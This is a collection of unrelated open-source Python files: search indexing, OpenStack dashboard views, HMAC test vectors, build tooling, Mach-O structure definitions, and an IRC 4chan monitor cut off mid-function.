def get_model(self):
return Document
def prepare_type(self, obj):
return "document"
def prepare_rating(self, obj):
ct = ContentType.objects.get_for_model(obj)
try:
rating = OverallRating.objects.filter(
object_id=obj.pk,
content_type=ct
).aggregate(r=Avg("rating"))["r"]
return float(str(rating or "0"))
except OverallRating.DoesNotExist:
return 0.0
def prepare_num_ratings(self, obj):
ct = ContentType.objects.get_for_model(obj)
try:
return OverallRating.objects.filter(
object_id=obj.pk,
content_type=ct
).all().count()
except OverallRating.DoesNotExist:
return 0
def prepare_num_comments(self, obj):
try:
return Comment.objects.filter(
object_id=obj.pk,
content_type=ContentType.objects.get_for_model(obj)
).all().count()
except:
return 0
def prepare_title_sortable(self, obj):
return obj.title.lower().lstrip()
| gpl-3.0 |
yeming233/horizon | openstack_dashboard/dashboards/admin/networks/subnets/views.py | 6 | 1903 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from openstack_dashboard.dashboards.project.networks.subnets \
import views as project_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import tables as admin_tables
from openstack_dashboard.dashboards.admin.networks.subnets import workflows
class CreateView(project_views.CreateView):
workflow_class = workflows.CreateSubnet
class UpdateView(project_views.UpdateView):
workflow_class = workflows.UpdateSubnet
class DetailView(project_views.DetailView):
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
subnet = context['subnet']
table = admin_tables.SubnetsTable(self.request,
network_id=subnet.network_id)
context["actions"] = table.render_row_actions(subnet)
context["url"] = \
reverse("horizon:admin:networks:subnets_tab",
args=[subnet.network_id])
return context
@staticmethod
def get_network_detail_url(network_id):
return reverse('horizon:admin:networks:detail',
args=(network_id,))
@staticmethod
def get_redirect_url():
return reverse('horizon:admin:networks:index')
| apache-2.0 |
nmercier/linux-cross-gcc | linux/lib/python2.7/dist-packages/Crypto/SelfTest/Hash/test_HMAC.py | 117 | 8197 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/HMAC.py: Self-test for the HMAC module
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Hash.HMAC"""
__revision__ = "$Id$"
from common import dict # For compatibility with Python 2.1 and 2.2
from Crypto.Util.py3compat import *
# This is a list of (key, data, results, description) tuples.
test_data = [
## Test vectors from RFC 2202 ##
# Test that the default hashmod is MD5
('0b' * 16,
'4869205468657265',
dict(default='9294727a3638bb1c13f48ef8158bfc9d'),
'default-is-MD5'),
# Test case 1 (MD5)
('0b' * 16,
'4869205468657265',
dict(MD5='9294727a3638bb1c13f48ef8158bfc9d'),
'RFC 2202 #1-MD5 (HMAC-MD5)'),
# Test case 1 (SHA1)
('0b' * 20,
'4869205468657265',
dict(SHA1='b617318655057264e28bc0b6fb378c8ef146be00'),
'RFC 2202 #1-SHA1 (HMAC-SHA1)'),
# Test case 2
('4a656665',
'7768617420646f2079612077616e7420666f72206e6f7468696e673f',
dict(MD5='750c783e6ab0b503eaa86e310a5db738',
SHA1='effcdf6ae5eb2fa2d27416d5f184df9c259a7c79'),
'RFC 2202 #2 (HMAC-MD5/SHA1)'),
# Test case 3 (MD5)
('aa' * 16,
'dd' * 50,
dict(MD5='56be34521d144c88dbb8c733f0e8b3f6'),
'RFC 2202 #3-MD5 (HMAC-MD5)'),
# Test case 3 (SHA1)
('aa' * 20,
'dd' * 50,
dict(SHA1='125d7342b9ac11cd91a39af48aa17b4f63f175d3'),
'RFC 2202 #3-SHA1 (HMAC-SHA1)'),
# Test case 4
('0102030405060708090a0b0c0d0e0f10111213141516171819',
'cd' * 50,
dict(MD5='697eaf0aca3a3aea3a75164746ffaa79',
SHA1='4c9007f4026250c6bc8414f9bf50c86c2d7235da'),
'RFC 2202 #4 (HMAC-MD5/SHA1)'),
# Test case 5 (MD5)
('0c' * 16,
'546573742057697468205472756e636174696f6e',
dict(MD5='56461ef2342edc00f9bab995690efd4c'),
'RFC 2202 #5-MD5 (HMAC-MD5)'),
# Test case 5 (SHA1)
# NB: We do not implement hash truncation, so we only test the full hash here.
('0c' * 20,
'546573742057697468205472756e636174696f6e',
dict(SHA1='4c1a03424b55e07fe7f27be1d58bb9324a9a5a04'),
'RFC 2202 #5-SHA1 (HMAC-SHA1)'),
# Test case 6
('aa' * 80,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b6579202d2048617368204b6579204669727374',
dict(MD5='6b1ab7fe4bd7bf8f0b62e6ce61b9d0cd',
SHA1='aa4ae5e15272d00e95705637ce8a3b55ed402112'),
'RFC 2202 #6 (HMAC-MD5/SHA1)'),
# Test case 7
('aa' * 80,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b657920616e64204c6172676572205468616e204f6e6520426c6f636b2d'
+ '53697a652044617461',
dict(MD5='6f630fad67cda0ee1fb1f562db3aa53e',
SHA1='e8e99d0f45237d786d6bbaa7965c7808bbff1a91'),
'RFC 2202 #7 (HMAC-MD5/SHA1)'),
## Test vectors from RFC 4231 ##
# 4.2. Test Case 1
('0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b',
'4869205468657265',
dict(SHA256='''
b0344c61d8db38535ca8afceaf0bf12b
881dc200c9833da726e9376c2e32cff7
'''),
'RFC 4231 #1 (HMAC-SHA256)'),
# 4.3. Test Case 2 - Test with a key shorter than the length of the HMAC
# output.
('4a656665',
'7768617420646f2079612077616e7420666f72206e6f7468696e673f',
dict(SHA256='''
5bdcc146bf60754e6a042426089575c7
5a003f089d2739839dec58b964ec3843
'''),
'RFC 4231 #2 (HMAC-SHA256)'),
# 4.4. Test Case 3 - Test with a combined length of key and data that is
# larger than 64 bytes (= block-size of SHA-224 and SHA-256).
('aa' * 20,
'dd' * 50,
dict(SHA256='''
773ea91e36800e46854db8ebd09181a7
2959098b3ef8c122d9635514ced565fe
'''),
'RFC 4231 #3 (HMAC-SHA256)'),
# 4.5. Test Case 4 - Test with a combined length of key and data that is
# larger than 64 bytes (= block-size of SHA-224 and SHA-256).
('0102030405060708090a0b0c0d0e0f10111213141516171819',
'cd' * 50,
dict(SHA256='''
82558a389a443c0ea4cc819899f2083a
85f0faa3e578f8077a2e3ff46729665b
'''),
'RFC 4231 #4 (HMAC-SHA256)'),
# 4.6. Test Case 5 - Test with a truncation of output to 128 bits.
#
# Not included because we do not implement hash truncation.
#
# 4.7. Test Case 6 - Test with a key larger than 128 bytes (= block-size of
# SHA-384 and SHA-512).
('aa' * 131,
'54657374205573696e67204c6172676572205468616e20426c6f636b2d53697a'
+ '65204b6579202d2048617368204b6579204669727374',
dict(SHA256='''
60e431591ee0b67f0d8a26aacbf5b77f
8e0bc6213728c5140546040f0ee37f54
'''),
'RFC 4231 #6 (HMAC-SHA256)'),
# 4.8. Test Case 7 - Test with a key and data that is larger than 128 bytes
# (= block-size of SHA-384 and SHA-512).
('aa' * 131,
'5468697320697320612074657374207573696e672061206c6172676572207468'
+ '616e20626c6f636b2d73697a65206b657920616e642061206c61726765722074'
+ '68616e20626c6f636b2d73697a6520646174612e20546865206b6579206e6565'
+ '647320746f20626520686173686564206265666f7265206265696e6720757365'
+ '642062792074686520484d414320616c676f726974686d2e',
dict(SHA256='''
9b09ffa71b942fcb27635fbcd5b0e944
bfdc63644f0713938a7f51535c3a35e2
'''),
'RFC 4231 #7 (HMAC-SHA256)'),
]
hashlib_test_data = [
# Test case 8 (SHA224)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA224='a30e01098bc6dbbf45690f3a7e9e6d0f8bbea2a39e6148008fd05e44'),
'RFC 4634 8.4 SHA224 (HMAC-SHA224)'),
# Test case 9 (SHA384)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA384='af45d2e376484031617f78d2b58a6b1b9c7ef464f5a01b47e42ec3736322445e8e2240ca5e69e2c78b3239ecfab21649'),
'RFC 4634 8.4 SHA384 (HMAC-SHA384)'),
# Test case 10 (SHA512)
('4a656665',
'7768617420646f2079612077616e74'
+ '20666f72206e6f7468696e673f',
dict(SHA512='164b7a7bfcf819e2e395fbe73b56e0a387bd64222e831fd610270cd7ea2505549758bf75c05a994a6d034f65f8f0e6fdcaeab1a34d4a6b4b636e070a38bce737'),
'RFC 4634 8.4 SHA512 (HMAC-SHA512)'),
]
def get_tests(config={}):
global test_data
from Crypto.Hash import HMAC, MD5, SHA as SHA1, SHA256
from common import make_mac_tests
hashmods = dict(MD5=MD5, SHA1=SHA1, SHA256=SHA256, default=None)
try:
from Crypto.Hash import SHA224, SHA384, SHA512
hashmods.update(dict(SHA224=SHA224, SHA384=SHA384, SHA512=SHA512))
test_data += hashlib_test_data
except ImportError:
import sys
sys.stderr.write("SelfTest: warning: not testing HMAC-SHA224/384/512 (not available)\n")
return make_mac_tests(HMAC, "HMAC", test_data, hashmods)
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| bsd-3-clause |
raskolnikova/infomaps | node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py | 2779 | 1665 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
generator_default_variables = {
}
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
locals = {
'target_list': target_list,
'target_dicts': target_dicts,
'data': data,
}
# Use a banner that looks like the stock Python one and like what
# code.interact uses by default, but tack on something to indicate what
# locals are available, and identify gypsh.
banner='Python %s on %s\nlocals.keys() = %s\ngypsh' % \
(sys.version, sys.platform, repr(sorted(locals.keys())))
code.interact(banner, local=locals)
| mit |
lcf8858/Sample_Lua | frameworks/cocos2d-x/tools/particle/convert_YCoordFlipped.py | 124 | 2224 | #!/usr/bin/python
#ConvertYCoordFlipped.py
import plistlib
import os.path
import argparse
import glob
import shutil
#keys in dictionary
metaDataKey = 'metaData'
yCoordFlippedConvertedKey = 'yCoordFlippedConverted'
yCoordFlippedKey = 'yCoordFlipped'
#check if the particle file has been converted
def checkFlippedConvertFlag(plistDict):
if(not plistDict.has_key(metaDataKey)):
return False
else:
metaDict = plistDict.get(metaDataKey)
if(not metaDict.has_key(yCoordFlippedConvertedKey)):
return False
else:
return metaDict.get(yCoordFlippedConvertedKey) is 1
#write flag to indicate to file has been converted
def writeFlippedConvertFlag(plistDict):
metaDict = dict()
metaDict.update(yCoordFlippedConverted = 1)
plistDict.update(metaData = metaDict)
#process file
def processConvertFile(filename):
#print a line to seperate files
print ('')
if(not os.path.isfile(filename)):
print(filename + ' dose not exist!')
return
print('Begin process particle file: ' + filename)
fp = open(filename, 'r')
pl = plistlib.readPlist(fp)
if (not pl.has_key(yCoordFlippedKey)):
print('Skip plist file: ' + filename + ' for there is no key for yCoordFlipped,')
else:
if(not checkFlippedConvertFlag(pl)):
backupFileName = filename+'.backup'
print('Write backup file to ' + backupFileName)
shutil.copyfile(filename,backupFileName)
print('converting...')
pl[yCoordFlippedKey] = -pl[yCoordFlippedKey]
writeFlippedConvertFlag(pl)
print('converted...')
print('Write new plist file to ' + filename)
plistlib.writePlist(pl,filename)
else:
print('Skip a converted file ' + filename)
# -------------- entrance --------------
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("file", nargs = "+",help = "specify a file or a patten")
#argparser.add_argument("-r", "--recursive",action = "store_true", help = "recursive folder or not")
args = argparser.parse_args()
for file in args.file:
processConvertFile(file)
| mit |
achang97/YouTunes | lib/python2.7/site-packages/oauth2client/contrib/django_util/models.py | 32 | 2742 | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains classes used for the Django ORM storage."""
import base64
import pickle
from django.db import models
from django.utils import encoding
import jsonpickle
import oauth2client
class CredentialsField(models.Field):
"""Django ORM field for storing OAuth2 Credentials."""
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return 'BinaryField'
def from_db_value(self, value, expression, connection, context):
"""Overrides ``models.Field`` method. This converts the value
returned from the database to an instance of this class.
"""
return self.to_python(value)
def to_python(self, value):
"""Overrides ``models.Field`` method. This is used to convert
bytes (from serialization etc) to an instance of this class"""
if value is None:
return None
elif isinstance(value, oauth2client.client.Credentials):
return value
else:
try:
return jsonpickle.decode(
base64.b64decode(encoding.smart_bytes(value)).decode())
except ValueError:
return pickle.loads(
base64.b64decode(encoding.smart_bytes(value)))
def get_prep_value(self, value):
"""Overrides ``models.Field`` method. This is used to convert
the value from an instances of this class to bytes that can be
inserted into the database.
"""
if value is None:
return None
else:
return encoding.smart_text(
base64.b64encode(jsonpickle.encode(value).encode()))
def value_to_string(self, obj):
"""Convert the field value from the provided model to a string.
Used during model serialization.
Args:
obj: db.Model, model object
Returns:
string, the serialized field value
"""
value = self._get_val_from_obj(obj)
return self.get_prep_value(value)
| mit |
jit/pyew | vstruct/defs/macho/loader.py | 18 | 18784 | import vstruct
from vstruct.primitives import *
from vstruct.defs.macho.const import *
vm_prot_t = v_uint32
cpu_type_t = v_uint32
cpu_subtype_t = v_uint32
lc_str = v_uint32
class mach_header(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.magic = v_uint32() # mach magic number identifier
self.cputype = cpu_type_t() # cpu specifier
self.cpusubtype = cpu_subtype_t() # machine specifier
self.filetype = v_uint32() # type of file
self.ncmds = v_uint32() # number of load commands
self.sizeofcmds = v_uint32() # the size of all the load commands
self.flags = v_uint32() # flags
def vsParse(self, bytes, offset=0):
# Over-ride this so we can do the parse, and make sure we
# had the right endianness.
ret = vstruct.VStruct.vsParse(self, bytes, offset=offset)
if self.magic == MH_CIGAM:
self._vs_fmtbase = '>'
ret = vstruct.VStruct.vsParse(self, bytes, offset=offset)
return ret
class mach_header_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.magic = v_uint32() # mach magic number identifier
self.cputype = cpu_type_t() # cpu specifier
self.cpusubtype = cpu_subtype_t() # machine specifier
self.filetype = v_uint32() # type of file
self.ncmds = v_uint32() # number of load commands
self.sizeofcmds = v_uint32() # the size of all the load commands
self.flags = v_uint32() # flags
self.reserved = v_uint32() # reserved
# FIXME all commands should subclass this one!
class load_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # type of load command
self.cmdsize = v_uint32() # total size of command in bytes
class segment_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SEGMENT
self.cmdsize = v_uint32() # includes sizeof section structs
self.segname = v_str(size=16) # segment name
self.vmaddr = v_uint32() # memory address of this segment
self.vmsize = v_uint32() # memory size of this segment
self.fileoff = v_uint32() # file offset of this segment
self.filesize = v_uint32() # amount to map from the file
self.maxprot = vm_prot_t() # maximum VM protection
self.initprot = vm_prot_t() # initial VM protection
self.nsects = v_uint32() # number of sections in segment
self.flags = v_uint32() # flags
class segment_command_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SEGMENT_64
self.cmdsize = v_uint32() # includes sizeof section_64 structs
self.segname[16] = v_uint8() # segment name
self.vmaddr = v_uint64() # memory address of this segment
self.vmsize = v_uint64() # memory size of this segment
self.fileoff = v_uint64() # file offset of this segment
self.filesize = v_uint64() # amount to map from the file
self.maxprot = vm_prot_t() # maximum VM protection
self.initprot = vm_prot_t() # initial VM protection
self.nsects = v_uint32() # number of sections in segment
self.flags = v_uint32() # flags
class section(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.sectname = v_str(size=16) # name of this section
self.segname = v_str(size=16) # segment this section goes in
self.addr = v_uint32() # memory address of this section
self.size = v_uint32() # size in bytes of this section
self.offset = v_uint32() # file offset of this section
self.align = v_uint32() # section alignment (power of 2)
self.reloff = v_uint32() # file offset of relocation entries
self.nreloc = v_uint32() # number of relocation entries
self.flags = v_uint32() # flags (section type and attributes)
self.reserved1 = v_uint32() # reserved (for offset or index)
self.reserved2 = v_uint32() # reserved (for count or sizeof)
class section_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.sectname = v_str(size=16) # name of this section
self.segname = v_str(size=16) # segment this section goes in
self.addr = v_uint64() # memory address of this section
self.size = v_uint64() # size in bytes of this section
self.offset = v_uint32() # file offset of this section
self.align = v_uint32() # section alignment (power of 2)
self.reloff = v_uint32() # file offset of relocation entries
self.nreloc = v_uint32() # number of relocation entries
self.flags = v_uint32() # flags (section type and attributes)
self.reserved1 = v_uint32() # reserved (for offset or index)
self.reserved2 = v_uint32() # reserved (for count or sizeof)
self.reserved3 = v_uint32() # reserved
class fvmlib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_IDFVMLIB or LC_LOADFVMLIB
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # library's target pathname
self.minor_version = v_uint32() # library's minor version number
self.header_addr = v_uint32() # library's header address
class dylib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ID_DYLIB, LC_LOAD_{,WEAK_}DYLIB, LC_REEXPORT_DYLIB
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # library's path name
self.timestamp = v_uint32() # library's build time stamp
self.current_version = v_uint32() # library's current version number
self.compatibility_version = v_uint32() # library's compatibility vers number
self.namedata = v_bytes(size=0)
def vsParse(self, bytes, offset=0):
# So we can grab the name data
retoff = vstruct.VStruct.vsParse(self, bytes, offset=offset)
# Grab the name from the inline data...
name = bytes[ offset + self.name : offset + self.cmdsize ]
self.namedata = name.split('\x00', 1)[0]
return retoff
class sub_framework_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_FRAMEWORK
self.cmdsize = v_uint32() # includes umbrella string
self.umbrella = lc_str() # the umbrella framework name
class sub_client_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_CLIENT
self.cmdsize = v_uint32() # includes client string
self.client = lc_str() # the client name
class sub_umbrella_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_UMBRELLA
self.cmdsize = v_uint32() # includes sub_umbrella string
self.sub_umbrella = lc_str() # the sub_umbrella framework name
class sub_library_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SUB_LIBRARY
self.cmdsize = v_uint32() # includes sub_library string
self.sub_library = lc_str() # the sub_library name
class prebound_dylib_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_PREBOUND_DYLIB
self.cmdsize = v_uint32() # includes strings
self.name = lc_str() # library's path name
self.nmodules = v_uint32() # number of modules in library
self.linked_modules = lc_str() # bit vector of linked modules
class dylinker_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ID_DYLINKER or LC_LOAD_DYLINKER
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # dynamic linker's path name
class thread_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_THREAD or LC_UNIXTHREAD
self.cmdsize = v_uint32() # total size of this command
class routines_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ROUTINES
self.cmdsize = v_uint32() # total size of this command
self.init_address = v_uint32() # address of initialization routine
self.init_module = v_uint32() # index into the module table that
self.reserved1 = v_uint32()
self.reserved2 = v_uint32()
self.reserved3 = v_uint32()
self.reserved4 = v_uint32()
self.reserved5 = v_uint32()
self.reserved6 = v_uint32()
class routines_command_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ROUTINES_64
self.cmdsize = v_uint32() # total size of this command
self.init_address = v_uint64() # address of initialization routine
self.init_module = v_uint64() # index into the module table that
self.reserved1 = v_uint64()
self.reserved2 = v_uint64()
self.reserved3 = v_uint64()
self.reserved4 = v_uint64()
self.reserved5 = v_uint64()
self.reserved6 = v_uint64()
class symtab_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SYMTAB
self.cmdsize = v_uint32() # sizeof(struct symtab_command)
self.symoff = v_uint32() # symbol table offset
self.nsyms = v_uint32() # number of symbol table entries
self.stroff = v_uint32() # string table offset
self.strsize = v_uint32() # string table size in bytes
class dysymtab_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_DYSYMTAB
self.cmdsize = v_uint32() # sizeof(struct dysymtab_command)
self.ilocalsym = v_uint32() # index to local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextdefsym = v_uint32() # index to externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.iundefsym = v_uint32() # index to undefined symbols
self.nundefsym = v_uint32() # number of undefined symbols
self.tocoff = v_uint32() # file offset to table of contents
self.ntoc = v_uint32() # number of entries in table of contents
self.modtaboff = v_uint32() # file offset to module table
self.nmodtab = v_uint32() # number of module table entries
self.extrefsymoff = v_uint32() # offset to referenced symbol table
self.nextrefsyms = v_uint32() # number of referenced symbol table entries
self.indirectsymoff = v_uint32() # file offset to the indirect symbol table
self.nindirectsyms = v_uint32() # number of indirect symbol table entries
self.extreloff = v_uint32() # offset to external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.locreloff = v_uint32() # offset to local relocation entries
self.nlocrel = v_uint32() # number of local relocation entries
class dylib_table_of_contents(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.symbol_index = v_uint32() # the defined external symbol (index into the symbol table)
self.module_index = v_uint32() # index into the module table this symbol is defined in
class dylib_module(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.module_name = v_uint32() # the module name (index into string table)
self.iextdefsym = v_uint32() # index into externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.irefsym = v_uint32() # index into reference symbol table
self.nrefsym = v_uint32() # number of reference symbol table entries
self.ilocalsym = v_uint32() # index into symbols for local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextrel = v_uint32() # index into external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.iinit_iterm = v_uint32() # low 16 bits are the index into the init section, high 16 bits are the index into the term section
self.ninit_nterm = v_uint32() # low 16 bits are the number of init section entries, high 16 bits are the number of term section entries
self.objc_module_info_addr = v_uint32() # the (__OBJC,__module_info) section
self.objc_module_info_size = v_uint32() # the (__OBJC,__module_info) section
class dylib_module_64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.module_name = v_uint32() # the module name (index into string table)
self.iextdefsym = v_uint32() # index into externally defined symbols
self.nextdefsym = v_uint32() # number of externally defined symbols
self.irefsym = v_uint32() # index into reference symbol table
self.nrefsym = v_uint32() # number of reference symbol table entries
self.ilocalsym = v_uint32() # index into symbols for local symbols
self.nlocalsym = v_uint32() # number of local symbols
self.iextrel = v_uint32() # index into external relocation entries
self.nextrel = v_uint32() # number of external relocation entries
self.iinit_iterm = v_uint32() # low 16 bits are the index into the init section, high 16 bits are the index into the term section
self.ninit_nterm = v_uint32() # low 16 bits are the number of init section entries, high 16 bits are the number of term section entries
self.objc_module_info_size = v_uint32() # the (__OBJC,__module_info) section
self.objc_module_info_addr = v_uint64() # the (__OBJC,__module_info) section
class dylib_reference(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.flags = v_uint32() # flags to indicate the type of reference
class twolevel_hints_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_TWOLEVEL_HINTS
self.cmdsize = v_uint32() # sizeof(struct twolevel_hints_command)
self.offset = v_uint32() # offset to the hint table
self.nhints = v_uint32() # number of hints in the hint table
class twolevel_hint(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.itoc = v_uint32() # index into the table of contents
class prebind_cksum_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_PREBIND_CKSUM
self.cmdsize = v_uint32() # sizeof(struct prebind_cksum_command)
self.cksum = v_uint32() # the check sum or zero
class uuid_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_UUID
self.cmdsize = v_uint32() # sizeof(struct uuid_command)
self.uuid[16] = v_uint8() # the 128-bit uuid
class rpath_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_RPATH
self.cmdsize = v_uint32() # includes string
self.path = lc_str() # path to add to run path
class linkedit_data_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_CODE_SIGNATURE or LC_SEGMENT_SPLIT_INFO
self.cmdsize = v_uint32() # sizeof(struct linkedit_data_command)
self.dataoff = v_uint32() # file offset of data in __LINKEDIT segment
self.datasize = v_uint32() # file size of data in __LINKEDIT segment
class encryption_info_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_ENCRYPTION_INFO
self.cmdsize = v_uint32() # sizeof(struct encryption_info_command)
self.cryptoff = v_uint32() # file offset of encrypted range
self.cryptsize = v_uint32() # file size of encrypted range
self.cryptid = v_uint32() # which enryption system, 0 means not-encrypted yet
class symseg_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_SYMSEG
self.cmdsize = v_uint32() # sizeof(struct symseg_command)
self.offset = v_uint32() # symbol segment offset
self.size = v_uint32() # symbol segment size in bytes
class ident_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_IDENT
self.cmdsize = v_uint32() # strings that follow this command
class fvmfile_command(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cmd = v_uint32() # LC_FVMFILE
self.cmdsize = v_uint32() # includes pathname string
self.name = lc_str() # files pathname
self.header_addr = v_uint32() # files virtual address
command_classes = {
LC_SEGMENT: segment_command,
LC_SYMTAB: symtab_command,
LC_LOAD_DYLIB: dylib_command,
}
def getCommandClass(cmdtype):
cls = command_classes.get(cmdtype)
if cls != None:
return cls
return load_command
| gpl-2.0 |
TheCrittaC/BigBen | modules/static/fourchanmonitor.py | 1 | 2518 | import irc
import json
from urllib import urlopen
import BeautifulSoup
import HTMLParser
import thread
from time import sleep
from re import sub, search
import traceback
class fourchanmonitor:
def __init__(self, connection):
self.connection = connection
monitorFile = open("./modules/static/ThreadMonitor", 'r')
monitorList = monitorFile.read().splitlines()
monitorFile.close()
for item in monitorList:
splitInfo = item.split(' :: ')
channel = splitInfo[0]
board = splitInfo[1]
regex = splitInfo[2]
updateInterval = int(splitInfo[3])
thread.start_new_thread(self.watchThreads,
(channel, board, regex,
updateInterval, self.connection))
def watchThreads(self, channel, board, regex,
updateInterval, connection):
oldPostNum = 0
postNum = 0
while 1:
try:
